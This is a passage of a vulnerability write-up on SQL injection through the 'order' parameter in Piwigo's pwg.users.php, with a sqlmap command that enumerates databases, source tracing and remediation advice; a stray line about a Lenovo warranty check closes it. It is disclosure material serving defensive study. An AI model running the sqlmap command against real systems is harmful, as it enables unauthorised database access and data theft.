Execution Parameters **py -3 sqlmap.py -r text.txt --batch --dbs** ![image.png](https://camo.githubusercontent.com/7ba72d70b9e2b468754530c69cca427ee1eb73ee4eb84813ccafeaba82ad08aa/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639343931363530352d35656262396535362d643131342d343332612d383431662d3930643338343037666463622e706e6723636c69656e7449643d7562353665386430332d643537352d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3637302669643d753162316330306630266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d363730266f726967696e57696474683d31373132266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d3739313932267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7530386334393539302d303134642d343333352d613034332d3536613833306530643064267469746c653d2677696474683d31373132) You can see that the database name has been read, so you can Dump sensitive data directly from the database. Furthermore, if the database has DBA privileges, an attacker can take over the server. ​

**Vulnerability analysis**

By analyzing the PHP files imported from ws.php and the parameters in the packet, you can trace it back to **pwg.users.php** ![image.png](https://camo.githubusercontent.com/fa054eb335941bd782574514bcc5eed7c794de3d0bd358d101b5f25708e0f3cb/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639363535343933322d37663061633531642d343566622d346664622d386237652d3563323162666563383762352e706e6723636c69656e7449643d7534343134613162342d633463662d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3834372669643d753734383239356138266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d383437266f726967696e57696474683d31383335266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313734383130267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7535653630373765632d616235352d346234302d393230372d6236393165623966643365267469746c653d2677696474683d31383335)

pwg.users.php is located in **\\include\\ws\_functions\\pwg.users.php**, and the order parameter is inserted into the SQL statement to join the query. And the SQL statement does not verify the validity of the passed parameters, resulting in SQL injection. ![image.png](https://camo.githubusercontent.com/ab6b7f5b2aab076bdd8abf0d0985d99401179e300256dde2f295ad0cdad12754/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639363637393139342d61326163353739302d666165662d343236302d613837612d6363376639643738343064392e706e6723636c69656e7449643d7534343134613162342d633463662d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3532352669643d753765393164383435266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d353235266f726967696e57696474683d31373437266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313031393233267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7561363535303330372d636335662d346666622d393531322d3039323235363530356333267469746c653d2677696474683d31373437)

**Vulnerability Fix**

​

1.  Precompile SQL statements in query parameters and filter special characters such as single and double quotation marks.
2.  Perform a global check on SQL injection to prevent SQL injection. ​

Search

lenovo warranty check/lookup | check warranty status | lenovo support us